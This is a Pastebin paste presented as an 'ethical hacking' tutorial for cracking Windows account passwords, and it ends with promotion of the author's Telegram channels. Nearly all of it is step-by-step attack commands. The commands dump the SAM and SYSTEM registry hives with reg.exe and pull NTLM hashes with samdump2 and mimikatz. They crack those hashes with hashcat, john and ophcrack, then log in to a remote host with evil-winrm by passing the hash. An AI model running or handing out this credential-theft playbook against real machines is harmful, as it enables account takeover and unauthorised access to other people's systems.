Advertisement
efxtv

PASSWORD CRACKING OF WINDOWS OPERATING SYSTEM SAM

Jan 24th, 2024 (edited)
369
1
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 2.00 KB | Cybersecurity | 1 0
  1. How To crack the Windows Password using SAM file How To crack the Windows Password using SAM file, complete Ethical hacking (Hacking into Windows 10)
  2. Tools we are going to use:
  3.  
  4. **********************************************
  5. Telegram post:
  6. https://t.me/efxtv2/3730
  7. **********************************************
  8.  
  9. 1. reg.exe : Extract SAM and SYSTEM file
  10. 2. samdump2 : Extract the hash
  11. 3. hashcat : Crack the hash
  12. 4. mimikatz : Extract the hash
  13. 5. john : Crack the hash
  14. 6. OPHCRACK : Crack the hash
  15. 7. revil-winrm : Hack remote host using hash
  16.  
  17. # Get the SAM and SYSTEM file using reg.exe
  18. - Open CMD as admin and type to save the file
  19. $ reg.exe save hklm\sam C:\Users\demo\Desktop\sam
  20. $ reg.exe save hklm\SYSTEM C:\Users\demo\Desktop\SYSTEM
  21.  
  22. # Extract hash with NTLM SAM
  23. $ sudo samdump2 SYSTEM SAM > hashes.txt
  24.  
  25. # Extract the NTLM hashes method 2
  26. - Go to https://github.com/ParrotSec/mimikatz
  27. - Download as zip, Extract the zip.
  28. - Get into 64/32 bit folder
  29. - Run mimikatz.exe.
  30. - Run the command
  31. $ lsadump::sam /system:C:\Users\demo\Desktop\SYSTEM /sam:C:\Users\demo\Desktop\sam
  32. - copy the NTLM hashes save in hashes.txt
  33.  
  34. # Crack the NTLM hashes
  35. $ hashcat -m 1000 -a 0 ./hashes.txt /usr/share/wordlists/rockyou.txt
  36.  
  37. # Crack NTLM hashes method 2
  38. $ john --format=NT hash.txt
  39.  
  40. # Crack the NTLM hashes method 3 (GUI) (work with java17)
  41. STEP 1: Go to Google and search for "OPH CRACKkali rainbow tables"
  42. - Download tables
  43. - XP free small (380MB)
  44. - Download Vista free (461MB)
  45.  
  46. STEP 2: Open OPHCRACK and click on tables
  47. - Click on XP free small
  48. - Click on install
  49. - Locate the extracted file
  50. - Click open Click ok
  51.  
  52. STEP 3 Copy extracted hash
  53. - Click Load
  54. - Single Hash
  55. - Click ok
  56. - Click Crack
  57.  
  58. # Login to windows evil-winrm
  59. $ revil-winrm -i 192.168.1.43 -u demo -H hashesddddddddddddlk
  60. $ revil-winrm -i 192.168.1.43 -u demo -p password
  61.  
  62. #Windows password cracking using #KaliLinux tools.
  63. Complete #EthicalHacking tutorial.
  64.  
  65. Thank you Regards
  66. @EFXTv
  67. Join VIP t.me/ERRORFIX_tv
  68.  
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement